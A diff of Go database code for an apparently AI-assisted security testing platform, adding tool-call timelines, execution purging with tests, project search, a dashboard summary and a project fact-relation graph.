db.logger.Warn("加载调用趋势失败", zap.Error(err))
|
||||||
|
continue
|
||||||
|
}
|
||||||
|
key := truncateCallsTimelineBucket(startTime, dailyBuckets)
|
||||||
|
entry := bucketMap[key]
|
||||||
|
entry.total++
|
||||||
|
entry.failed += failed
|
||||||
|
bucketMap[key] = entry
|
||||||
|
}
|
||||||
|
|
||||||
|
buckets := make([]CallsTimelineBucket, 0, len(bucketMap))
|
||||||
|
for bucketTime, counts := range bucketMap {
|
||||||
|
buckets = append(buckets, CallsTimelineBucket{
|
||||||
|
BucketTime: bucketTime,
|
||||||
|
Total: counts.total,
|
||||||
|
Failed: counts.failed,
|
||||||
|
})
|
||||||
|
}
|
||||||
|
sort.Slice(buckets, func(i, j int) bool {
|
||||||
|
return buckets[i].BucketTime.Before(buckets[j].BucketTime)
|
||||||
|
})
|
||||||
|
return buckets, nil
|
||||||
|
}
|
||||||
|
|
||||||
// DecreaseToolStats 减少工具统计信息(用于删除执行记录时)
|
// DecreaseToolStats 减少工具统计信息(用于删除执行记录时)
|
||||||
// 如果统计信息变为0,则删除该统计记录
|
// 如果统计信息变为0,则删除该统计记录
|
||||||
func (db *DB) DecreaseToolStats(toolName string, totalCalls, successCalls, failedCalls int) error {
|
func (db *DB) DecreaseToolStats(toolName string, totalCalls, successCalls, failedCalls int) error {
|
||||||
|
|||||||
@@ -0,0 +1,122 @@
|
|||||||
|
package database
|
||||||
|
|
||||||
|
import (
|
||||||
|
"path/filepath"
|
||||||
|
"testing"
|
||||||
|
"time"
|
||||||
|
|
||||||
|
"cyberstrike-ai/internal/mcp"
|
||||||
|
|
||||||
|
"go.uber.org/zap"
|
||||||
|
)
|
||||||
|
|
||||||
|
func TestPurgeToolExecutionsBefore(t *testing.T) {
|
||||||
|
dbPath := filepath.Join(t.TempDir(), "monitor.db")
|
||||||
|
db, err := NewDB(dbPath, zap.NewNop())
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("NewDB: %v", err)
|
||||||
|
}
|
||||||
|
defer db.Close()
|
||||||
|
|
||||||
|
oldStart := time.Now().AddDate(0, 0, -100)
|
||||||
|
newStart := time.Now().AddDate(0, 0, -1)
|
||||||
|
|
||||||
|
oldExec := &mcp.ToolExecution{
|
||||||
|
ID: "old-completed",
|
||||||
|
ToolName: "nmap::scan",
|
||||||
|
Arguments: map[string]interface{}{"target": "127.0.0.1"},
|
||||||
|
Status: "completed",
|
||||||
|
StartTime: oldStart,
|
||||||
|
}
|
||||||
|
oldFailed := &mcp.ToolExecution{
|
||||||
|
ID: "old-failed",
|
||||||
|
ToolName: "nmap::scan",
|
||||||
|
Arguments: map[string]interface{}{"target": "127.0.0.1"},
|
||||||
|
Status: "failed",
|
||||||
|
Error: "timeout",
|
||||||
|
StartTime: oldStart,
|
||||||
|
}
|
||||||
|
newExec := &mcp.ToolExecution{
|
||||||
|
ID: "new-completed",
|
||||||
|
ToolName: "nmap::scan",
|
||||||
|
Arguments: map[string]interface{}{"target": "127.0.0.1"},
|
||||||
|
Status: "completed",
|
||||||
|
StartTime: newStart,
|
||||||
|
}
|
||||||
|
for _, exec := range []*mcp.ToolExecution{oldExec, oldFailed, newExec} {
|
||||||
|
if err := db.SaveToolExecution(exec); err != nil {
|
||||||
|
t.Fatalf("SaveToolExecution(%s): %v", exec.ID, err)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
if err := db.UpdateToolStats("nmap::scan", 3, 2, 1, &newStart); err != nil {
|
||||||
|
t.Fatalf("UpdateToolStats: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
cutoff := time.Now().AddDate(0, 0, -90)
|
||||||
|
deleted, err := db.PurgeToolExecutionsBefore(cutoff)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("PurgeToolExecutionsBefore: %v", err)
|
||||||
|
}
|
||||||
|
if deleted != 2 {
|
||||||
|
t.Fatalf("deleted = %d, want 2", deleted)
|
||||||
|
}
|
||||||
|
|
||||||
|
if _, err := db.GetToolExecution("old-completed"); err == nil {
|
||||||
|
t.Fatal("old-completed should be deleted")
|
||||||
|
}
|
||||||
|
if _, err := db.GetToolExecution("old-failed"); err == nil {
|
||||||
|
t.Fatal("old-failed should be deleted")
|
||||||
|
}
|
||||||
|
if _, err := db.GetToolExecution("new-completed"); err != nil {
|
||||||
|
t.Fatalf("new-completed should remain: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
stats, err := db.LoadToolStats()
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("LoadToolStats: %v", err)
|
||||||
|
}
|
||||||
|
stat := stats["nmap::scan"]
|
||||||
|
if stat == nil {
|
||||||
|
t.Fatal("expected stats for nmap::scan")
|
||||||
|
}
|
||||||
|
if stat.TotalCalls != 1 || stat.SuccessCalls != 1 || stat.FailedCalls != 0 {
|
||||||
|
t.Fatalf("stats after purge = %+v, want total=1 success=1 failed=0", stat)
|
||||||
|
}
|
||||||
|
|
||||||
|
total, err := db.CountToolExecutions("", "")
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("CountToolExecutions: %v", err)
|
||||||
|
}
|
||||||
|
if total != 1 {
|
||||||
|
t.Fatalf("remaining executions = %d, want 1", total)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestPurgeToolExecutionsBefore_zeroRetentionSkipsViaService(t *testing.T) {
|
||||||
|
// RetentionDaysEffective: 0 means no purge at service layer; DB method still works when called directly.
|
||||||
|
dbPath := filepath.Join(t.TempDir(), "monitor.db")
|
||||||
|
db, err := NewDB(dbPath, zap.NewNop())
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("NewDB: %v", err)
|
||||||
|
}
|
||||||
|
defer db.Close()
|
||||||
|
|
||||||
|
exec := &mcp.ToolExecution{
|
||||||
|
ID: "ancient",
|
||||||
|
ToolName: "curl::get",
|
||||||
|
Arguments: map[string]interface{}{},
|
||||||
|
Status: "completed",
|
||||||
|
StartTime: time.Now().AddDate(-1, 0, 0),
|
||||||
|
}
|
||||||
|
if err := db.SaveToolExecution(exec); err != nil {
|
||||||
|
t.Fatalf("SaveToolExecution: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
deleted, err := db.PurgeToolExecutionsBefore(time.Now())
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("PurgeToolExecutionsBefore: %v", err)
|
||||||
|
}
|
||||||
|
if deleted != 1 {
|
||||||
|
t.Fatalf("deleted = %d, want 1", deleted)
|
||||||
|
}
|
||||||
|
}
|
||||||
@@ -51,7 +51,6 @@ type ProjectFact struct {
|
|||||||
SourceConversationID string `json:"source_conversation_id,omitempty"`
|
SourceConversationID string `json:"source_conversation_id,omitempty"`
|
||||||
SourceMessageID string `json:"source_message_id,omitempty"`
|
SourceMessageID string `json:"source_message_id,omitempty"`
|
||||||
Pinned bool `json:"pinned"`
|
Pinned bool `json:"pinned"`
|
||||||
SupersedesFactID string `json:"supersedes_fact_id,omitempty"`
|
|
||||||
RelatedVulnerabilityID string `json:"related_vulnerability_id,omitempty"`
|
RelatedVulnerabilityID string `json:"related_vulnerability_id,omitempty"`
|
||||||
CreatedAt time.Time `json:"created_at"`
|
CreatedAt time.Time `json:"created_at"`
|
||||||
UpdatedAt time.Time `json:"updated_at"`
|
UpdatedAt time.Time `json:"updated_at"`
|
||||||
@@ -112,10 +111,30 @@ func (db *DB) GetProject(id string) (*Project, error) {
|
|||||||
return &p, nil
|
return &p, nil
|
||||||
}
|
}
|
||||||
|
|
||||||
|
// CountProjects 统计项目数量。
|
||||||
|
func (db *DB) CountProjects(status, search string) (int, error) {
|
||||||
|
query := `SELECT COUNT(*) FROM projects WHERE 1=1`
|
||||||
|
args := []interface{}{}
|
||||||
|
if s := strings.TrimSpace(status); s != "" {
|
||||||
|
query += " AND status = ?"
|
||||||
|
args = append(args, s)
|
||||||
|
}
|
||||||
|
if q := strings.TrimSpace(search); q != "" {
|
||||||
|
pattern := "%" + q + "%"
|
||||||
|
query += " AND (name LIKE ? OR COALESCE(description,'') LIKE ?)"
|
||||||
|
args = append(args, pattern, pattern)
|
||||||
|
}
|
||||||
|
var count int
|
||||||
|
if err := db.QueryRow(query, args...).Scan(&count); err != nil {
|
||||||
|
return 0, fmt.Errorf("统计项目失败: %w", err)
|
||||||
|
}
|
||||||
|
return count, nil
|
||||||
|
}
|
||||||
|
|
||||||
// ListProjects 列出项目。
|
// ListProjects 列出项目。
|
||||||
func (db *DB) ListProjects(status string, limit, offset int) ([]*Project, error) {
|
func (db *DB) ListProjects(status, search string, limit, offset int) ([]*Project, error) {
|
||||||
if limit <= 0 {
|
if limit <= 0 {
|
||||||
limit = 200
|
limit = 50
|
||||||
}
|
}
|
||||||
query := `SELECT id, name, COALESCE(description,''), COALESCE(scope_json,''), status, pinned, created_at, updated_at
|
query := `SELECT id, name, COALESCE(description,''), COALESCE(scope_json,''), status, pinned, created_at, updated_at
|
||||||
FROM projects WHERE 1=1`
|
FROM projects WHERE 1=1`
|
||||||
@@ -124,6 +143,11 @@ func (db *DB) ListProjects(status string, limit, offset int) ([]*Project, error)
|
|||||||
query += " AND status = ?"
|
query += " AND status = ?"
|
||||||
args = append(args, s)
|
args = append(args, s)
|
||||||
}
|
}
|
||||||
|
if q := strings.TrimSpace(search); q != "" {
|
||||||
|
pattern := "%" + q + "%"
|
||||||
|
query += " AND (name LIKE ? OR COALESCE(description,'') LIKE ?)"
|
||||||
|
args = append(args, pattern, pattern)
|
||||||
|
}
|
||||||
query += " ORDER BY pinned DESC, updated_at DESC LIMIT ? OFFSET ?"
|
query += " ORDER BY pinned DESC, updated_at DESC LIMIT ? OFFSET ?"
|
||||||
args = append(args, limit, offset)
|
args = append(args, limit, offset)
|
||||||
|
|
||||||
@@ -171,6 +195,7 @@ func (db *DB) DeleteProject(id string) error {
|
|||||||
if err != nil {
|
if err != nil {
|
||||||
return fmt.Errorf("删除项目失败: %w", err)
|
return fmt.Errorf("删除项目失败: %w", err)
|
||||||
}
|
}
|
||||||
|
db.removeProjectScopedDirs(id)
|
||||||
return nil
|
return nil
|
||||||
}
|
}
|
||||||
|
|
||||||
@@ -215,7 +240,7 @@ func (db *DB) SetConversationProjectID(conversationID, projectID string) error {
|
|||||||
func (db *DB) ListProjectFactsForIndex(projectID string, includeDeprecated bool) ([]*ProjectFact, error) {
|
func (db *DB) ListProjectFactsForIndex(projectID string, includeDeprecated bool) ([]*ProjectFact, error) {
|
||||||
query := `SELECT id, project_id, fact_key, category, summary, COALESCE(body,''), confidence,
|
query := `SELECT id, project_id, fact_key, category, summary, COALESCE(body,''), confidence,
|
||||||
COALESCE(source_conversation_id,''), COALESCE(source_message_id,''), pinned,
|
COALESCE(source_conversation_id,''), COALESCE(source_message_id,''), pinned,
|
||||||
COALESCE(supersedes_fact_id,''), COALESCE(related_vulnerability_id,''), created_at, updated_at
|
COALESCE(related_vulnerability_id,''), created_at, updated_at
|
||||||
FROM project_facts WHERE project_id = ?`
|
FROM project_facts WHERE project_id = ?`
|
||||||
args := []interface{}{projectID}
|
args := []interface{}{projectID}
|
||||||
if !includeDeprecated {
|
if !includeDeprecated {
|
||||||
@@ -237,7 +262,7 @@ func (db *DB) ListProjectFacts(projectID string, filter ProjectFactListFilter, l
|
|||||||
}
|
}
|
||||||
query := `SELECT id, project_id, fact_key, category, summary, COALESCE(body,''), confidence,
|
query := `SELECT id, project_id, fact_key, category, summary, COALESCE(body,''), confidence,
|
||||||
COALESCE(source_conversation_id,''), COALESCE(source_message_id,''), pinned,
|
COALESCE(source_conversation_id,''), COALESCE(source_message_id,''), pinned,
|
||||||
COALESCE(supersedes_fact_id,''), COALESCE(related_vulnerability_id,''), created_at, updated_at
|
COALESCE(related_vulnerability_id,''), created_at, updated_at
|
||||||
FROM project_facts WHERE project_id = ?`
|
FROM project_facts WHERE project_id = ?`
|
||||||
args := []interface{}{projectID}
|
args := []interface{}{projectID}
|
||||||
if c := strings.TrimSpace(filter.Category); c != "" {
|
if c := strings.TrimSpace(filter.Category); c != "" {
|
||||||
@@ -276,7 +301,7 @@ func (db *DB) GetProjectFactByKey(projectID, factKey string) (*ProjectFact, erro
|
|||||||
row := db.QueryRow(
|
row := db.QueryRow(
|
||||||
`SELECT id, project_id, fact_key, category, summary, COALESCE(body,''), confidence,
|
`SELECT id, project_id, fact_key, category, summary, COALESCE(body,''), confidence,
|
||||||
COALESCE(source_conversation_id,''), COALESCE(source_message_id,''), pinned,
|
COALESCE(source_conversation_id,''), COALESCE(source_message_id,''), pinned,
|
||||||
COALESCE(supersedes_fact_id,''), COALESCE(related_vulnerability_id,''), created_at, updated_at
|
COALESCE(related_vulnerability_id,''), created_at, updated_at
|
||||||
FROM project_facts WHERE project_id = ? AND fact_key = ?`,
|
FROM project_facts WHERE project_id = ? AND fact_key = ?`,
|
||||||
projectID, factKey,
|
projectID, factKey,
|
||||||
)
|
)
|
||||||
@@ -288,7 +313,7 @@ func (db *DB) GetProjectFact(id string) (*ProjectFact, error) {
|
|||||||
row := db.QueryRow(
|
row := db.QueryRow(
|
||||||
`SELECT id, project_id, fact_key, category, summary, COALESCE(body,''), confidence,
|
`SELECT id, project_id, fact_key, category, summary, COALESCE(body,''), confidence,
|
||||||
COALESCE(source_conversation_id,''), COALESCE(source_message_id,''), pinned,
|
COALESCE(source_conversation_id,''), COALESCE(source_message_id,''), pinned,
|
||||||
COALESCE(supersedes_fact_id,''), COALESCE(related_vulnerability_id,''), created_at, updated_at
|
COALESCE(related_vulnerability_id,''), created_at, updated_at
|
||||||
FROM project_facts WHERE id = ?`, id,
|
FROM project_facts WHERE id = ?`, id,
|
||||||
)
|
)
|
||||||
return scanProjectFactRow(row)
|
return scanProjectFactRow(row)
|
||||||
@@ -327,24 +352,15 @@ func (db *DB) UpsertProjectFact(f *ProjectFact) (*ProjectFact, error) {
|
|||||||
if strings.TrimSpace(f.Confidence) == "" {
|
if strings.TrimSpace(f.Confidence) == "" {
|
||||||
f.Confidence = existing.Confidence
|
f.Confidence = existing.Confidence
|
||||||
}
|
}
|
||||||
if projectFactContentChanged(existing, f) {
|
|
||||||
versionID, verr := db.InsertProjectFactVersion(existing)
|
|
||||||
if verr != nil {
|
|
||||||
return nil, verr
|
|
||||||
}
|
|
||||||
f.SupersedesFactID = versionID
|
|
||||||
} else if f.SupersedesFactID == "" {
|
|
||||||
f.SupersedesFactID = existing.SupersedesFactID
|
|
||||||
}
|
|
||||||
_, err = db.Exec(
|
_, err = db.Exec(
|
||||||
`UPDATE project_facts SET category = ?, summary = ?, body = ?, confidence = ?,
|
`UPDATE project_facts SET category = ?, summary = ?, body = ?, confidence = ?,
|
||||||
source_conversation_id = COALESCE(?, source_conversation_id),
|
source_conversation_id = COALESCE(?, source_conversation_id),
|
||||||
source_message_id = COALESCE(?, source_message_id),
|
source_message_id = COALESCE(?, source_message_id),
|
||||||
pinned = ?, supersedes_fact_id = ?, related_vulnerability_id = ?, updated_at = ?
|
pinned = ?, related_vulnerability_id = ?, updated_at = ?
|
||||||
WHERE id = ?`,
|
WHERE id = ?`,
|
||||||
f.Category, f.Summary, f.Body, f.Confidence,
|
f.Category, f.Summary, f.Body, f.Confidence,
|
||||||
nullIfEmpty(f.SourceConversationID), nullIfEmpty(f.SourceMessageID), boolToInt(f.Pinned),
|
nullIfEmpty(f.SourceConversationID), nullIfEmpty(f.SourceMessageID), boolToInt(f.Pinned),
|
||||||
nullIfEmpty(f.SupersedesFactID), nullIfEmpty(f.RelatedVulnerabilityID), f.UpdatedAt, f.ID,
|
nullIfEmpty(f.RelatedVulnerabilityID), f.UpdatedAt, f.ID,
|
||||||
)
|
)
|
||||||
if err != nil {
|
if err != nil {
|
||||||
return nil, fmt.Errorf("更新事实失败: %w", err)
|
return nil, fmt.Errorf("更新事实失败: %w", err)
|
||||||
@@ -360,12 +376,12 @@ func (db *DB) UpsertProjectFact(f *ProjectFact) (*ProjectFact, error) {
|
|||||||
_, err = db.Exec(
|
_, err = db.Exec(
|
||||||
`INSERT INTO project_facts (
|
`INSERT INTO project_facts (
|
||||||
id, project_id, fact_key, category, summary, body, confidence,
|
id, project_id, fact_key, category, summary, body, confidence,
|
||||||
source_conversation_id, source_message_id, pinned, supersedes_fact_id, related_vulnerability_id,
|
source_conversation_id, source_message_id, pinned, related_vulnerability_id,
|
||||||
created_at, updated_at
|
created_at, updated_at
|
||||||
) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)`,
|
) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)`,
|
||||||
f.ID, f.ProjectID, f.FactKey, f.Category, f.Summary, f.Body, f.Confidence,
|
f.ID, f.ProjectID, f.FactKey, f.Category, f.Summary, f.Body, f.Confidence,
|
||||||
nullIfEmpty(f.SourceConversationID), nullIfEmpty(f.SourceMessageID), boolToInt(f.Pinned),
|
nullIfEmpty(f.SourceConversationID), nullIfEmpty(f.SourceMessageID), boolToInt(f.Pinned),
|
||||||
nullIfEmpty(f.SupersedesFactID), nullIfEmpty(f.RelatedVulnerabilityID),
|
nullIfEmpty(f.RelatedVulnerabilityID),
|
||||||
f.CreatedAt, f.UpdatedAt,
|
f.CreatedAt, f.UpdatedAt,
|
||||||
)
|
)
|
||||||
if err != nil {
|
if err != nil {
|
||||||
@@ -374,7 +390,7 @@ func (db *DB) UpsertProjectFact(f *ProjectFact) (*ProjectFact, error) {
|
|||||||
return f, nil
|
return f, nil
|
||||||
}
|
}
|
||||||
|
|
||||||
// DeprecateProjectFact 将事实标记为 deprecated。
|
// DeprecateProjectFact 将事实标记为 deprecated(关联边同步 deprecated)。
|
||||||
func (db *DB) DeprecateProjectFact(projectID, factKey string) error {
|
func (db *DB) DeprecateProjectFact(projectID, factKey string) error {
|
||||||
res, err := db.Exec(
|
res, err := db.Exec(
|
||||||
`UPDATE project_facts SET confidence = 'deprecated', updated_at = ? WHERE project_id = ? AND fact_key = ?`,
|
`UPDATE project_facts SET confidence = 'deprecated', updated_at = ? WHERE project_id = ? AND fact_key = ?`,
|
||||||
@@ -387,7 +403,7 @@ func (db *DB) DeprecateProjectFact(projectID, factKey string) error {
|
|||||||
if n == 0 {
|
if n == 0 {
|
||||||
return fmt.Errorf("事实不存在")
|
return fmt.Errorf("事实不存在")
|
||||||
}
|
}
|
||||||
return nil
|
return db.DeprecateProjectFactEdgesForKey(projectID, factKey)
|
||||||
}
|
}
|
||||||
|
|
||||||
// RestoreProjectFact 将已废弃事实恢复为 tentative 或 confirmed(重新参与黑板索引)。
|
// RestoreProjectFact 将已废弃事实恢复为 tentative 或 confirmed(重新参与黑板索引)。
|
||||||
@@ -415,9 +431,16 @@ func (db *DB) RestoreProjectFact(projectID, factKey, confidence string) error {
|
|||||||
return err
|
return err
|
||||||
}
|
}
|
||||||
|
|
||||||
// DeleteProjectFact 删除事实。
|
// DeleteProjectFact 删除事实(级联删除相关边)。
|
||||||
func (db *DB) DeleteProjectFact(id string) error {
|
func (db *DB) DeleteProjectFact(id string) error {
|
||||||
_, err := db.Exec(`DELETE FROM project_facts WHERE id = ?`, id)
|
f, err := db.GetProjectFact(id)
|
||||||
|
if err != nil {
|
||||||
|
return err
|
||||||
|
}
|
||||||
|
if err := db.DeleteProjectFactEdgesForKey(f.ProjectID, f.FactKey); err != nil {
|
||||||
|
return err
|
||||||
|
}
|
||||||
|
_, err = db.Exec(`DELETE FROM project_facts WHERE id = ?`, id)
|
||||||
return err
|
return err
|
||||||
}
|
}
|
||||||
|
|
||||||
@@ -440,7 +463,7 @@ func scanProjectFactRow(row *sql.Row) (*ProjectFact, error) {
|
|||||||
err := row.Scan(
|
err := row.Scan(
|
||||||
&f.ID, &f.ProjectID, &f.FactKey, &f.Category, &f.Summary, &f.Body, &f.Confidence,
|
&f.ID, &f.ProjectID, &f.FactKey, &f.Category, &f.Summary, &f.Body, &f.Confidence,
|
||||||
&f.SourceConversationID, &f.SourceMessageID, &pinned,
|
&f.SourceConversationID, &f.SourceMessageID, &pinned,
|
||||||
&f.SupersedesFactID, &f.RelatedVulnerabilityID, &createdAt, &updatedAt,
|
&f.RelatedVulnerabilityID, &createdAt, &updatedAt,
|
||||||
)
|
)
|
||||||
if err != nil {
|
if err != nil {
|
||||||
if err == sql.ErrNoRows {
|
if err == sql.ErrNoRows {
|
||||||
@@ -461,7 +484,7 @@ func scanProjectFactFromRows(rows *sql.Rows) (*ProjectFact, error) {
|
|||||||
err := rows.Scan(
|
err := rows.Scan(
|
||||||
&f.ID, &f.ProjectID, &f.FactKey, &f.Category, &f.Summary, &f.Body, &f.Confidence,
|
&f.ID, &f.ProjectID, &f.FactKey, &f.Category, &f.Summary, &f.Body, &f.Confidence,
|
||||||
&f.SourceConversationID, &f.SourceMessageID, &pinned,
|
&f.SourceConversationID, &f.SourceMessageID, &pinned,
|
||||||
&f.SupersedesFactID, &f.RelatedVulnerabilityID, &createdAt, &updatedAt,
|
&f.RelatedVulnerabilityID, &createdAt, &updatedAt,
|
||||||
)
|
)
|
||||||
if err != nil {
|
if err != nil {
|
||||||
return nil, err
|
return nil, err
|
||||||
|
|||||||
@@ -0,0 +1,91 @@
|
|||||||
|
package database
|
||||||
|
|
||||||
|
import (
|
||||||
|
"fmt"
|
||||||
|
"strings"
|
||||||
|
"time"
|
||||||
|
)
|
||||||
|
|
||||||
|
// ProjectDashboardFact 仪表盘跨项目近期事实条目。
|
||||||
|
type ProjectDashboardFact struct {
|
||||||
|
ID string `json:"id"`
|
||||||
|
ProjectID string `json:"project_id"`
|
||||||
|
ProjectName string `json:"project_name"`
|
||||||
|
FactKey string `json:"fact_key"`
|
||||||
|
Category string `json:"category"`
|
||||||
|
Summary string `json:"summary"`
|
||||||
|
Confidence string `json:"confidence"`
|
||||||
|
Pinned bool `json:"pinned"`
|
||||||
|
UpdatedAt time.Time `json:"updated_at"`
|
||||||
|
}
|
||||||
|
|
||||||
|
// ProjectDashboardTotals 仪表盘项目事实汇总计数。
|
||||||
|
type ProjectDashboardTotals struct {
|
||||||
|
ActiveProjects int `json:"active_projects"`
|
||||||
|
TotalFacts int `json:"total_facts"`
|
||||||
|
}
|
||||||
|
|
||||||
|
// ProjectDashboardSummary 仪表盘项目情报摘要。
|
||||||
|
type ProjectDashboardSummary struct {
|
||||||
|
RecentFacts []ProjectDashboardFact `json:"recent_facts"`
|
||||||
|
Totals ProjectDashboardTotals `json:"totals"`
|
||||||
|
}
|
||||||
|
|
||||||
|
// GetProjectDashboardSummary 聚合跨项目近期事实(仅活跃项目、排除 deprecated)。
|
||||||
|
func (db *DB) GetProjectDashboardSummary(factLimit int) (*ProjectDashboardSummary, error) {
|
||||||
|
if factLimit <= 0 {
|
||||||
|
factLimit = 5
|
||||||
|
}
|
||||||
|
if factLimit > 50 {
|
||||||
|
factLimit = 50
|
||||||
|
}
|
||||||
|
|
||||||
|
out := &ProjectDashboardSummary{
|
||||||
|
RecentFacts: []ProjectDashboardFact{},
|
||||||
|
}
|
||||||
|
|
||||||
|
if err := db.QueryRow(`SELECT COUNT(*) FROM projects WHERE status = 'active'`).Scan(&out.Totals.ActiveProjects); err != nil {
|
||||||
|
return nil, fmt.Errorf("统计活跃项目失败: %w", err)
|
||||||
|
}
|
||||||
|
if err := db.QueryRow(
|
||||||
|
`SELECT COUNT(*) FROM project_facts f
|
||||||
|
INNER JOIN projects p ON p.id = f.project_id
|
||||||
|
WHERE f.confidence != 'deprecated' AND p.status = 'active'`,
|
||||||
|
).Scan(&out.Totals.TotalFacts); err != nil {
|
||||||
|
return nil, fmt.Errorf("统计事实失败: %w", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
rows, err := db.Query(
|
||||||
|
`SELECT f.id, f.project_id, p.name, f.fact_key, f.category, f.summary, f.confidence, f.pinned, f.updated_at
|
||||||
|
FROM project_facts f
|
||||||
|
INNER JOIN projects p ON p.id = f.project_id
|
||||||
|
WHERE f.confidence != 'deprecated' AND p.status = 'active'
|
||||||
|
ORDER BY f.pinned DESC, f.updated_at DESC
|
||||||
|
LIMIT ?`,
|
||||||
|
factLimit,
|
||||||
|
)
|
||||||
|
if err != nil {
|
||||||
|
return nil, fmt.Errorf("查询近期事实失败: %w", err)
|
||||||
|
}
|
||||||
|
defer rows.Close()
|
||||||
|
|
||||||
|
for rows.Next() {
|
||||||
|
var item ProjectDashboardFact
|
||||||
|
var pinned int
|
||||||
|
var updatedAt string
|
||||||
|
if err := rows.Scan(
|
||||||
|
&item.ID, &item.ProjectID, &item.ProjectName, &item.FactKey,
|
||||||
|
&item.Category, &item.Summary, &item.Confidence, &pinned, &updatedAt,
|
||||||
|
); err != nil {
|
||||||
|
return nil, err
|
||||||
|
}
|
||||||
|
item.Pinned = pinned != 0
|
||||||
|
item.ProjectName = strings.TrimSpace(item.ProjectName)
|
||||||
|
item.UpdatedAt = parseDBTime(updatedAt)
|
||||||
|
out.RecentFacts = append(out.RecentFacts, item)
|
||||||
|
}
|
||||||
|
if err := rows.Err(); err != nil {
|
||||||
|
return nil, err
|
||||||
|
}
|
||||||
|
return out, nil
|
||||||
|
}
|
||||||
@@ -0,0 +1,410 @@
|
|||||||
|
package database
|
||||||
|
|
||||||
|
import (
|
||||||
|
"database/sql"
|
||||||
|
"fmt"
|
||||||
|
"strings"
|
||||||
|
"time"
|
||||||
|
|
||||||
|
"github.com/google/uuid"
|
||||||
|
)
|
||||||
|
|
||||||
|
// ValidProjectFactEdgeTypes 项目事实图允许的边类型。
|
||||||
|
var ValidProjectFactEdgeTypes = map[string]struct{}{
|
||||||
|
"depends_on": {},
|
||||||
|
"leads_to": {},
|
||||||
|
"enables": {},
|
||||||
|
"exploits": {},
|
||||||
|
"discovered_on": {},
|
||||||
|
"contains": {},
|
||||||
|
"part_of": {},
|
||||||
|
"supports": {},
|
||||||
|
}
|
||||||
|
|
||||||
|
// ProjectFactEdge 项目事实关系边(source → target)。
|
||||||
|
type ProjectFactEdge struct {
|
||||||
|
ID string `json:"id"`
|
||||||
|
ProjectID string `json:"project_id"`
|
||||||
|
SourceFactKey string `json:"source_fact_key"`
|
||||||
|
TargetFactKey string `json:"target_fact_key"`
|
||||||
|
EdgeType string `json:"edge_type"`
|
||||||
|
Confidence string `json:"confidence"` // confirmed | tentative | deprecated
|
||||||
|
SourceConversationID string `json:"source_conversation_id,omitempty"`
|
||||||
|
CreatedAt time.Time `json:"created_at"`
|
||||||
|
UpdatedAt time.Time `json:"updated_at"`
|
||||||
|
}
|
||||||
|
|
||||||
|
// ProjectFactEdgeInput 写入边时的输入(出边:source → To)。
|
||||||
|
type ProjectFactEdgeInput struct {
|
||||||
|
To string `json:"to"`
|
||||||
|
Type string `json:"type"`
|
||||||
|
Confidence string `json:"confidence,omitempty"`
|
||||||
|
}
|
||||||
|
|
||||||
|
// ProjectFactEdgeFromInput 写入入边时的输入(From → 当前事实)。
|
||||||
|
type ProjectFactEdgeFromInput struct {
|
||||||
|
From string `json:"from"`
|
||||||
|
Type string `json:"type"`
|
||||||
|
Confidence string `json:"confidence,omitempty"`
|
||||||
|
}
|
||||||
|
|
||||||
|
// ProjectFactGraphNode 图 API 节点。
|
||||||
|
type ProjectFactGraphNode struct {
|
||||||
|
ID string `json:"id"`
|
||||||
|
FactKey string `json:"fact_key"`
|
||||||
|
Category string `json:"category"`
|
||||||
|
Label string `json:"label"` // 图节点短标签(截断)
|
||||||
|
Summary string `json:"summary"` // 完整摘要(侧栏等详情用)
|
||||||
|
Confidence string `json:"confidence"`
|
||||||
|
Type string `json:"type"`
|
||||||
|
Pinned bool `json:"pinned"`
|
||||||
|
}
|
||||||
|
|
||||||
|
// ProjectFactGraphEdge 图 API 边。
|
||||||
|
type ProjectFactGraphEdge struct {
|
||||||
|
ID string `json:"id"`
|
||||||
|
Source string `json:"source"`
|
||||||
|
Target string `json:"target"`
|
||||||
|
Type string `json:"type"`
|
||||||
|
Confidence string `json:"confidence"`
|
||||||
|
}
|
||||||
|
|
||||||
|
// ProjectFactGraph 项目事实图。
|
||||||
|
type ProjectFactGraph struct {
|
||||||
|
Nodes []ProjectFactGraphNode `json:"nodes"`
|
||||||
|
Edges []ProjectFactGraphEdge `json:"edges"`
|
||||||
|
}
|
||||||
|
|
||||||
|
// ValidateProjectFactEdgeType 校验边类型。
|
||||||
|
func ValidateProjectFactEdgeType(edgeType string) error {
|
||||||
|
edgeType = strings.TrimSpace(strings.ToLower(edgeType))
|
||||||
|
if edgeType == "" {
|
||||||
|
return fmt.Errorf("edge type 不能为空")
|
||||||
|
}
|
||||||
|
if _, ok := ValidProjectFactEdgeTypes[edgeType]; !ok {
|
||||||
|
return fmt.Errorf("无效的 edge type: %s", edgeType)
|
||||||
|
}
|
||||||
|
return nil
|
||||||
|
}
|
||||||
|
|
||||||
|
func normalizeEdgeConfidence(confidence string) string {
|
||||||
|
confidence = strings.TrimSpace(strings.ToLower(confidence))
|
||||||
|
switch confidence {
|
||||||
|
case "confirmed", "deprecated":
|
||||||
|
return confidence
|
||||||
|
default:
|
||||||
|
return "tentative"
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// ListProjectFactEdgesByProject 列出项目全部边。
|
||||||
|
func (db *DB) ListProjectFactEdgesByProject(projectID string) ([]*ProjectFactEdge, error) {
|
||||||
|
rows, err := db.Query(
|
||||||
|
`SELECT id, project_id, source_fact_key, target_fact_key, edge_type, confidence,
|
||||||
|
COALESCE(source_conversation_id,''), created_at, updated_at
|
||||||
|
FROM project_fact_edges
|
||||||
|
WHERE project_id = ?
|
||||||
|
ORDER BY created_at ASC, rowid ASC`,
|
||||||
|
projectID,
|
||||||
|
)
|
||||||
|
if err != nil {
|
||||||
|
return nil, err
|
||||||
|
}
|
||||||
|
defer rows.Close()
|
||||||
